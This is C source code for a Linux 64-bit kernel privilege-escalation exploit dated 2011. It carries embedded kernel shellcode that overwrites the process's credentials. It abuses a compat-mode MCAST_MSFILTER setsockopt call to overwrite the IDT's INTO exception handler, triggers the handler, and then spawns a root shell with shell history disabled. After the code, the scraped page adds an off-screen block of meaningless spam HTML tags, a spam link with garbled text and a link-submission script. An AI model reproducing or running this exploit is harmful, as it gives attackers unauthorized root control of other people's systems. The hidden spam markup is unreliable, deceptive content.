/****************************************************************************
 *	Linux 64-bit Compatibility Mode Stack Pointer Underflow 
 *		      Privilege escalation exploit
 *			a.k.a the compat mess
 *			  a.k.a x64_hav0c.c
 *			      by teach
 *
 * VxHell Labs CONFIDENTIAL - SOURCE MATERIALS
 *
 * This is unpublished proprietary source code of VxHell Labs.
 *
 * The contents of these coded instructions, statements and computer
 * programs may not be disclosed to third parties, copied or duplicated in
 * any form, in whole or in part, without the prior written permission of
 * his author. This includes especially the Bugtraq mailing list, 
 * the www.exploit-db.com website and/or any public exploit archive.
 *
 * (C) COPYRIGHT teach, 2011
 * All Rights Reserved
 *
 * teach@vxhell.org
 *
 * For [teh lulz and maybe] educational purposes. Use it at your own risk.
**
******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/user.h>

struct __kernel_sockaddr_storage {
	char dummy[128];
};

struct compat_group_filter {
	unsigned int gf_interface;
	struct __kernel_sockaddr_storage gf_group __attribute__ ((aligned(4)));
	unsigned int gf_fmode;
	unsigned int gf_numsrc;
	struct __kernel_sockaddr_storage gf_slist[1] 
	__attribute__ ((aligned(4)));
} __attribute__ ((packed));

struct argsblock {
	int sockfd;
	int level;
	int optname;
	void *optval;
	socklen_t *optlen;
} __attribute__((packed));

struct idt_struct
{
	unsigned short limit;
	unsigned long base;
} __attribute__((packed));

unsigned int uid, gid;
int sockfd;
struct compat_group_filter gf32;
struct argsblock args;

/* this is pure magic and awesomeness: complete x64 priv. escalation shellcode blob */
char elitekernshellcodez[] = 
"\x55\x48\x89\xe5\x48\x83\xec\x10"
"\x48\xc7\x45\xf8\x00\x00\x00\x00"
"\xe8\x21\x00\x00\x00\x48\x89\x45"
"\xf8\x48\x83\x7d\xf8\x00\x75\x09"
"\xe8\x83\x00\x00\x00\x48\x89\x45"
"\xf8\x48\x8b\x7d\xf8\xe8\xd2\x00"
"\x00\x00\xc9\x48\xcf\xc3"
"\x55\x48\x89\xe5\x48\xc7\x45\xf8"
"\x00\x00\x00\x00\x48\x8d\x45\xf8"
"\x48\x89\x45\xf8\x48\x8b\x45\xf8"
"\x48\x25\x00\xf0\xff\xff\x48\x8b"
"\x00\x48\x89\x45\xf8\x48\x8b\x55"
"\xf8\x48\xb8\xff\xff\xff\xff\xff"
"\xff\xff\xef\x48\x39\xc2\x76\x0c"
"\x48\x8b\x45\xf8\x48\x3d\x00\x00"
"\x00\xf0\x76\x0a\x48\xc7\x45\xe8"
"\x00\x00\x00\x00\xeb\x1e\x48\x8b"
"\x45\xf8\x48\x8b\x00\x48\x85\xc0"
"\x74\x0a\x48\xc7\x45\xe8\x00\x00"
"\x00\x00\xeb\x08\x48\x8b\x45\xf8"
"\x48\x89\x45\xe8\x48\x8b\x45\xe8"
"\xc9\xc3"
"\x55\x48\x89\xe5\x48\xc7\x45\xf8"
"\x00\x00\x00\x00\x48\x8d\x45\xf8"
"\x48\x89\x45\xf8\x48\x8b\x45\xf8"
"\x48\x25\x00\xe0\xff\xff\x48\x8b"
"\x00\x48\x89\x45\xf8\x48\x8b\x55"
"\xf8\x48\xb8\xff\xff\xff\xff\xff"
"\xff\xff\xef\x48\x39\xc2\x76\x0c"
"\x48\x8b\x45\xf8\x48\x3d\x00\x00"
"\x00\xf0\x76\x0a\x48\xc7\x45\xe8"
"\x00\x00\x00\x00\xeb\x08\x48\x8b"
"\x45\xf8\x48\x89\x45\xe8\x48\x8b"
"\x45\xe8\xc9\xc3"
"\x55\x48\x89\xe5\x48\x89\x7d\xe8"
"\x48\x8b\x45\xe8\x48\x89\x45\xf8"
"\xc7\x45\xf4\x00\x00\x00\x00\xe9"
"\xde\x01\x00\x00\x8b\x45\xf4\x48"
"\x98\x48\xc1\xe0\x02\x48\x03\x45"
"\xf8\x8b\x00\x3d\x37\x13\x37\x13"
"\x0f\x85\xc0\x01\x00\x00\x48\x8b"
"\x55\xf8\x48\x83\xc2\x04\x8b\x45"
"\xf4\x48\x98\x48\xc1\xe0\x02\x48"
"\x8d\x04\x02\x8b\x00\x3d\x37\x13"
"\x37\x13\x0f\x85\x9e\x01\x00\x00"
"\x48\x8b\x55\xf8\x48\x83\xc2\x08"
"\x8b\x45\xf4\x48\x98\x48\xc1\xe0"
"\x02\x48\x8d\x04\x02\x8b\x00\x3d"
"\x37\x13\x37\x13\x0f\x85\x7c\x01"
"\x00\x00\x48\x8b\x55\xf8\x48\x83"
"\xc2\x0c\x8b\x45\xf4\x48\x98\x48"
"\xc1\xe0\x02\x48\x8d\x04\x02\x8b"
"\x00\x3d\x37\x13\x37\x13\x0f\x85"
"\x5a\x01\x00\x00\x48\x8b\x55\xf8"
"\x48\x83\xc2\x10\x8b\x45\xf4\x48"
"\x98\x48\xc1\xe0\x02\x48\x8d\x04"
"\x02\x8b\x00\x3d\xbe\xba\xad\xde"
"\x0f\x85\x38\x01\x00\x00\x48\x8b"
"\x55\xf8\x48\x83\xc2\x14\x8b\x45"
"\xf4\x48\x98\x48\xc1\xe0\x02\x48"
"\x8d\x04\x02\x8b\x00\x3d\xbe\xba"
"\xad\xde\x0f\x85\x16\x01\x00\x00"
"\x48\x8b\x55\xf8\x48\x83\xc2\x18"
"\x8b\x45\xf4\x48\x98\x48\xc1\xe0"
"\x02\x48\x8d\x04\x02\x8b\x00\x3d"
"\xbe\xba\xad\xde\x0f\x85\xf4\x00"
"\x00\x00\x48\x8b\x55\xf8\x48\x83"
"\xc2\x1c\x8b\x45\xf4\x48\x98\x48"
"\xc1\xe0\x02\x48\x8d\x04\x02\x8b"
"\x00\x3d\xbe\xba\xad\xde\x0f\x85"
"\xd2\x00\x00\x00\x8b\x45\xf4\x48"
"\x98\x48\xc1\xe0\x02\x48\x03\x45"
"\xf8\xc7\x00\x00\x00\x00\x00\x48"
"\x8b\x55\xf8\x48\x83\xc2\x04\x8b"
"\x45\xf4\x48\x98\x48\xc1\xe0\x02"
"\x48\x8d\x04\x02\xc7\x00\x00\x00"
"\x00\x00\x48\x8b\x55\xf8\x48\x83"
"\xc2\x08\x8b\x45\xf4\x48\x98\x48"
"\xc1\xe0\x02\x48\x8d\x04\x02\xc7"
"\x00\x00\x00\x00\x00\x48\x8b\x55"
"\xf8\x48\x83\xc2\x0c\x8b\x45\xf4"
"\x48\x98\x48\xc1\xe0\x02\x48\x8d"
"\x04\x02\xc7\x00\x00\x00\x00\x00"
"\x48\x8b\x55\xf8\x48\x83\xc2\x10"
"\x8b\x45\xf4\x48\x98\x48\xc1\xe0"
"\x02\x48\x8d\x04\x02\xc7\x00\x00"
"\x00\x00\x00\x48\x8b\x55\xf8\x48"
"\x83\xc2\x14\x8b\x45\xf4\x48\x98"
"\x48\xc1\xe0\x02\x48\x8d\x04\x02"
"\xc7\x00\x00\x00\x00\x00\x48\x8b"
"\x55\xf8\x48\x83\xc2\x18\x8b\x45"
"\xf4\x48\x98\x48\xc1\xe0\x02\x48"
"\x8d\x04\x02\xc7\x00\x00\x00\x00"
"\x00\x48\x8b\x55\xf8\x48\x83\xc2"
"\x1c\x8b\x45\xf4\x48\x98\x48\xc1"
"\xe0\x02\x48\x8d\x04\x02\xc7\x00"
"\x00\x00\x00\x00\xeb\x11\x83\x45"
"\xf4\x01\x81\x7d\xf4\xff\x0f\x00"
"\x00\x0f\x8e\x15\xfe\xff\xff\xc9"
"\xc3";

void fill_shellcode(void) {
	
	unsigned char *p = (unsigned char *)elitekernshellcodez;
	int i;
	for(i=0; i<sizeof(elitekernshellcodez); i++) {
		if( *(unsigned int *)(p+i) == 0x13371337) {
			*(unsigned int *)(p+i) = uid;
		}
		if( *(unsigned int *)(p+i) == 0xdeadbabe) {
			*(unsigned int *)(p+i) = gid;
		}
	}
}

void kernel_write(unsigned long long where, unsigned long what) {

	unsigned int esp=0x00407350;
	unsigned int *ptr, *addr, i;
	unsigned long *ptrargs;
	
	printf("[+] Switching new stack to 0x%x\n", esp);
	addr = mmap(
			(unsigned int *)(esp & (~(PAGE_SIZE-1))), 
			PAGE_SIZE, 
			PROT_READ | PROT_WRITE, 
			MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0
		);
			
	if(addr == MAP_FAILED || addr != (unsigned int *)(esp & (~(PAGE_SIZE-1)))) {
		perror("[-] mmap");
		exit(-1);
	}
	
	esp = esp - where - 0x8;
	printf("[+] computed len: 0x%x\n", esp);
	
	memset(&gf32, 0x00, sizeof(struct compat_group_filter));
	ptr = (unsigned int *)&gf32;
	for(i=0; i<sizeof(struct compat_group_filter); i++)
		ptr[i] = what;
	args.sockfd = sockfd;
	args.level = SOL_IP;
	args.optname = MCAST_MSFILTER;
	args.optval = &gf32;
	args.optlen = &esp;
	ptrargs = (unsigned long *)&args;
	
	sleep(1);
	__asm__ __volatile__(
		"push %%ebx\n\t"
		"push %%ecx\n\t"
		"movl $0x66, %%eax\n\t"
		"movl $0xf, %%ebx\n\t"
		"movl %0, %%ecx\n\t"
		"movl %%esp, %%edx\n\t"
		"movl $0x00407350, %%esp\n\t"
		"int $0x80\n\t"
		"movl %%edx, %%esp\n\t"
		"pop %%ecx\n\t"	
		"pop %%ebx\n\t"	
		: 
		: "r"(ptrargs)
		: "memory", "eax", "ebx", "ecx", "edx"
	);
	munmap(addr, PAGE_SIZE);
}

void spawn_rootshell(void) 
{
	char *argv[] = { "/bin/sh", NULL };
	char *envp[] = {
	"TERM=linux", "BASH_HISTORY=/dev/null",
	"HISTORY=/dev/null", "history=/dev/null",
	"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", 
	 NULL 
	};

	execve("/bin/sh", argv, envp);
	printf("[-]Error: unable to spawn a shell\n");
	exit(-1);
}

int main(int argc, char *argv[]) {

	struct idt_struct idt;
	unsigned long long idt64base, entry;
	unsigned long addr = 0;
	unsigned char *kscaddr = (unsigned char *)0x73507350;
	
	printf(
"			.::: VxHell Labs presents :::.\n"
"	.:: Linux 64-bit Compatibility Mode Stack Pointer Underflow ::.\n"
"		      .:: Privilege escalation exploit ::.\n"
"			      .:: by teach ::.\n"
	);
   
	sockfd = socket(AF_INET, SOCK_DGRAM, 0);
	if(sockfd < 0) {
		perror("[-] socket");
		exit(-1);
	}
	
	uid = getuid();
	gid = getgid();
	
	memset(&idt, 0x00, sizeof(struct idt_struct));
	__asm__ __volatile__("sidt %0\n\t" : "=m"(idt));
	idt64base = idt.base | 0xFFFFFFFF00000000ULL;
	printf("[+] IDT found at 0x%llx ... \n", idt64base);
	
	entry = idt64base + (16*0x04);	
	printf("[+] INTO exception vector address: 0x%llx \n", entry);
	
	kscaddr = mmap(
			(unsigned char *)((unsigned int)kscaddr & (~(PAGE_SIZE-1))), 
			PAGE_SIZE*2, 
			PROT_READ | PROT_WRITE | PROT_EXEC, 
			MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0
		);
	if(kscaddr == MAP_FAILED) {
		perror("[-] mmap kernel shellcode:");
		exit(-1);
	}
	memset((unsigned char *)((unsigned int)kscaddr & (~(PAGE_SIZE-1))), 0x90, PAGE_SIZE*2);
	fill_shellcode();
	memcpy(kscaddr+100, elitekernshellcodez, sizeof(elitekernshellcodez));
	printf("[+] Mapping kernel shellcode at %p ... \n", kscaddr+100);
	
	addr = ( (unsigned long)kscaddr << 16 ) | 0xffff;
	addr = addr & 0xffff0000;
	printf("[+] Overwriting low 16bits of INTO exception handler address ... \n");	
	kernel_write(entry-2, addr);
	addr = ( (unsigned long)kscaddr >> 16 ) | 0xffff0000;
	printf("[+] Overwriting mid 16bits of INTO exception handler address ... \n");	
	kernel_write(entry+6, addr);
	printf("[+] Overwriting high 32bits of INTO exception handler address ... \n");	
	kernel_write(entry+8, 0x00000000);
	
	printf("[+] Triggering INTO exception...\n");
	__asm__ __volatile__(
			"cld\n\t"
			"movl $0x7FFFFFFF, %%eax\n\t"
			"addl $0x7FFFFFFF, %%eax\n\t"
			"into\n\t"
			::: "eax"
			);
	
	if(getuid() == 0){
		printf("[+] Got root !\n");
		spawn_rootshell();
	}
	else
		printf("[-] Exploit failed. Shit happens ...?\n");
		
	munmap((unsigned char *)((unsigned int)kscaddr & (~(PAGE_SIZE-1))), PAGE_SIZE*2);
	return -1;
}




<div style="position:fixed;left:-9000px;top:-9000px;"><em id="7ztzv"></em><center id="7ztzv"></center><mark id="7ztzv"><center id="7ztzv"></center></mark><output id="7ztzv"><noframes id="7ztzv"></noframes></output><font id="7ztzv"><delect id="7ztzv"></delect></font><ruby id="7ztzv"><big id="7ztzv"></big></ruby><progress id="7ztzv"><sub id="7ztzv"></sub></progress><th id="7ztzv"><big id="7ztzv"></big></th><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><video id="7ztzv"></video></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><strike id="7ztzv"><span id="7ztzv"></span></strike><em id="7ztzv"><span id="7ztzv"></span></em><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><noframes id="7ztzv"></noframes></th><em id="7ztzv"><span id="7ztzv"></span></em><ins id="7ztzv"><b id="7ztzv"></b></ins><ol id="7ztzv"><output id="7ztzv"></output></ol><menuitem id="7ztzv"><thead id="7ztzv"></thead></menuitem><del id="7ztzv"><ruby id="7ztzv"></ruby></del><noframes id="7ztzv"><span id="7ztzv"></span></noframes><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><progress id="7ztzv"><thead id="7ztzv"></thead></progress><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><strike id="7ztzv"><pre id="7ztzv"></pre></strike><em id="7ztzv"><address id="7ztzv"></address></em><big id="7ztzv"><address id="7ztzv"></address></big><address id="7ztzv"><listing id="7ztzv"></listing></address><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><big id="7ztzv"><sub id="7ztzv"></sub></big><var id="7ztzv"><meter id="7ztzv"></meter></var><span id="7ztzv"><video id="7ztzv"></video></span><listing id="7ztzv"><mark id="7ztzv"></mark></listing><progress id="7ztzv"><address id="7ztzv"></address></progress><nobr id="7ztzv"><progress id="7ztzv"></progress></nobr><noframes id="7ztzv"><sub id="7ztzv"></sub></noframes><font id="7ztzv"><delect id="7ztzv"></delect></font><strike id="7ztzv"><pre id="7ztzv"></pre></strike><delect id="7ztzv"><menuitem id="7ztzv"></menuitem></delect><em id="7ztzv"><pre id="7ztzv"></pre></em><mark id="7ztzv"><cite id="7ztzv"></cite></mark><delect id="7ztzv"><ins id="7ztzv"></ins></delect><pre id="7ztzv"><rp id="7ztzv"></rp></pre><cite id="7ztzv"><var id="7ztzv"></var></cite><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><ruby id="7ztzv"><p id="7ztzv"></p></ruby><em id="7ztzv"><form id="7ztzv"></form></em><rp id="7ztzv"><em id="7ztzv"></em></rp>
<video id="7ztzv"><noframes id="7ztzv"></noframes></video><cite id="7ztzv"><del id="7ztzv"></del></cite><meter id="7ztzv"><thead id="7ztzv"></thead></meter><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><thead id="7ztzv"></thead></meter><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><mark id="7ztzv"><cite id="7ztzv"></cite></mark><menuitem id="7ztzv"><font id="7ztzv"></font></menuitem><del id="7ztzv"><rp id="7ztzv"></rp></del><thead id="7ztzv"><delect id="7ztzv"></delect></thead><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><ins id="7ztzv"><cite id="7ztzv"></cite></ins><delect id="7ztzv"><output id="7ztzv"></output></delect><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><p id="7ztzv"></p></ruby><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><progress id="7ztzv"><address id="7ztzv"></address></progress><thead id="7ztzv"><var id="7ztzv"></var></thead><ins id="7ztzv"><i id="7ztzv"></i></ins><ins id="7ztzv"><b id="7ztzv"></b></ins><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><ins id="7ztzv"><i id="7ztzv"></i></ins><font id="7ztzv"><delect id="7ztzv"></delect></font><em id="7ztzv"><form id="7ztzv"></form></em><var id="7ztzv"><ins id="7ztzv"></ins></var><span id="7ztzv"><th id="7ztzv"></th></span><ol id="7ztzv"><rp id="7ztzv"></rp></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><address id="7ztzv"><dfn id="7ztzv"></dfn></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><noframes id="7ztzv"><span id="7ztzv"></span></noframes><noframes id="7ztzv"><form id="7ztzv"></form></noframes><big id="7ztzv"><form id="7ztzv"></form></big><track id="7ztzv"><noframes id="7ztzv"></noframes></track><em id="7ztzv"><span id="7ztzv"></span></em><span id="7ztzv"><th id="7ztzv"></th></span><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><em id="7ztzv"></em></video><delect id="7ztzv"><ins id="7ztzv"></ins></delect><b id="7ztzv"><del id="7ztzv"></del></b><progress id="7ztzv"><sub id="7ztzv"></sub></progress><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><rp id="7ztzv"><em id="7ztzv"></em></rp><track id="7ztzv"><noframes id="7ztzv"></noframes></track><address id="7ztzv"><th id="7ztzv"></th></address><cite id="7ztzv"><delect id="7ztzv"></delect></cite><cite id="7ztzv"><var id="7ztzv"></var></cite><output id="7ztzv"><i id="7ztzv"></i></output><track id="7ztzv"><big id="7ztzv"></big></track>
<big id="7ztzv"><address id="7ztzv"></address></big><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><font id="7ztzv"></font></meter><address id="7ztzv"><nobr id="7ztzv"></nobr></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><pre id="7ztzv"><video id="7ztzv"></video></pre><th id="7ztzv"><progress id="7ztzv"></progress></th><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><em id="7ztzv"></em></ruby><del id="7ztzv"><ins id="7ztzv"></ins></del><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><var id="7ztzv"></var></thead><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><b id="7ztzv"><del id="7ztzv"></del></b><big id="7ztzv"><address id="7ztzv"></address></big><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><ins id="7ztzv"></ins></ol><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><listing id="7ztzv"><progress id="7ztzv"></progress></listing><delect id="7ztzv"><output id="7ztzv"></output></delect><noframes id="7ztzv"><span id="7ztzv"></span></noframes><track id="7ztzv"><noframes id="7ztzv"></noframes></track><menuitem id="7ztzv"><sub id="7ztzv"></sub></menuitem><address id="7ztzv"><th id="7ztzv"></th></address><address id="7ztzv"><track id="7ztzv"></track></address><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><em id="7ztzv"><pre id="7ztzv"></pre></em><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><form id="7ztzv"></form></em><form id="7ztzv"><track id="7ztzv"></track></form><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><rp id="7ztzv"><noframes id="7ztzv"></noframes></rp><i id="7ztzv"><ol id="7ztzv"></ol></i><i id="7ztzv"><del id="7ztzv"></del></i><cite id="7ztzv"><delect id="7ztzv"></delect></cite><strike id="7ztzv"><dl id="7ztzv"></dl></strike><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><address id="7ztzv"><th id="7ztzv"></th></address><ins id="7ztzv"><font id="7ztzv"></font></ins><thead id="7ztzv"><var id="7ztzv"></var></thead><video id="7ztzv"><strike id="7ztzv"></strike></video><p id="7ztzv"><pre id="7ztzv"></pre></p><video id="7ztzv"><i id="7ztzv"></i></video><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><listing id="7ztzv"></listing></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><address id="7ztzv"><th id="7ztzv"></th></address><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var>
<p id="7ztzv"><var id="7ztzv"></var></p><ins id="7ztzv"><i id="7ztzv"></i></ins><strike id="7ztzv"><span id="7ztzv"></span></strike><del id="7ztzv"><output id="7ztzv"></output></del><font id="7ztzv"><delect id="7ztzv"></delect></font><output id="7ztzv"><em id="7ztzv"></em></output><p id="7ztzv"><span id="7ztzv"></span></p><big id="7ztzv"><thead id="7ztzv"></thead></big><video id="7ztzv"><noframes id="7ztzv"></noframes></video><b id="7ztzv"><ol id="7ztzv"></ol></b><font id="7ztzv"><dfn id="7ztzv"></dfn></font><font id="7ztzv"><var id="7ztzv"></var></font><ins id="7ztzv"><i id="7ztzv"></i></ins><dfn id="7ztzv"><meter id="7ztzv"></meter></dfn><rp id="7ztzv"><strike id="7ztzv"></strike></rp><del id="7ztzv"><ruby id="7ztzv"></ruby></del><var id="7ztzv"><ruby id="7ztzv"></ruby></var><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><del id="7ztzv"><ruby id="7ztzv"></ruby></del><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><track id="7ztzv"><noframes id="7ztzv"></noframes></track><form id="7ztzv"><nobr id="7ztzv"></nobr></form><video id="7ztzv"><big id="7ztzv"></big></video><video id="7ztzv"><em id="7ztzv"></em></video><p id="7ztzv"><span id="7ztzv"></span></p><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><ins id="7ztzv"><b id="7ztzv"></b></ins><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><var id="7ztzv"><mark id="7ztzv"></mark></var><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><address id="7ztzv"><th id="7ztzv"></th></address><form id="7ztzv"><th id="7ztzv"></th></form><mark id="7ztzv"><cite id="7ztzv"></cite></mark><progress id="7ztzv"><font id="7ztzv"></font></progress><mark id="7ztzv"><cite id="7ztzv"></cite></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><mark id="7ztzv"><font id="7ztzv"></font></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><pre id="7ztzv"><video id="7ztzv"></video></pre><strike id="7ztzv"><dl id="7ztzv"></dl></strike><delect id="7ztzv"><ins id="7ztzv"></ins></delect><dl id="7ztzv"><rp id="7ztzv"></rp></dl><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><p id="7ztzv"><dl id="7ztzv"></dl></p><mark id="7ztzv"><i id="7ztzv"></i></mark><meter id="7ztzv"><sub id="7ztzv"></sub></meter><rp id="7ztzv"><em id="7ztzv"></em></rp><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead>
<th id="7ztzv"><big id="7ztzv"></big></th><del id="7ztzv"><rp id="7ztzv"></rp></del><video id="7ztzv"><big id="7ztzv"></big></video><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><big id="7ztzv"><sub id="7ztzv"></sub></big><track id="7ztzv"><em id="7ztzv"></em></track><cite id="7ztzv"><ol id="7ztzv"></ol></cite><i id="7ztzv"><dl id="7ztzv"></dl></i><noframes id="7ztzv"><address id="7ztzv"></address></noframes><ruby id="7ztzv"><i id="7ztzv"></i></ruby><delect id="7ztzv"><output id="7ztzv"></output></delect><delect id="7ztzv"><output id="7ztzv"></output></delect><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><ol id="7ztzv"><ruby id="7ztzv"></ruby></ol><delect id="7ztzv"><output id="7ztzv"></output></delect><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><track id="7ztzv"><big id="7ztzv"></big></track><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><b id="7ztzv"></b></mark><i id="7ztzv"><ol id="7ztzv"></ol></i><progress id="7ztzv"><sub id="7ztzv"></sub></progress><rp id="7ztzv"><strike id="7ztzv"></strike></rp><font id="7ztzv"><var id="7ztzv"></var></font><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><em id="7ztzv"></em></th><delect id="7ztzv"><ins id="7ztzv"></ins></delect><sub id="7ztzv"><delect id="7ztzv"></delect></sub><progress id="7ztzv"><sub id="7ztzv"></sub></progress><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><listing id="7ztzv"></listing></thead><form id="7ztzv"><th id="7ztzv"></th></form><track id="7ztzv"><em id="7ztzv"></em></track><dfn id="7ztzv"><menuitem id="7ztzv"></menuitem></dfn><b id="7ztzv"><dl id="7ztzv"></dl></b><nobr id="7ztzv"><big id="7ztzv"></big></nobr><track id="7ztzv"><progress id="7ztzv"></progress></track><ruby id="7ztzv"><p id="7ztzv"></p></ruby><pre id="7ztzv"><nobr id="7ztzv"></nobr></pre><pre id="7ztzv"><track id="7ztzv"></track></pre><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><i id="7ztzv"></i></mark><rp id="7ztzv"><p id="7ztzv"></p></rp><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><sub id="7ztzv"><dfn id="7ztzv"></dfn></sub><thead id="7ztzv"><var id="7ztzv"></var></thead><i id="7ztzv"><ol id="7ztzv"></ol></i><track id="7ztzv"><strike id="7ztzv"></strike></track></div>

<a href="http://www.bjnorthway.com/">ÑÇÖÞÅ·ÃÀÔÚÏß</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>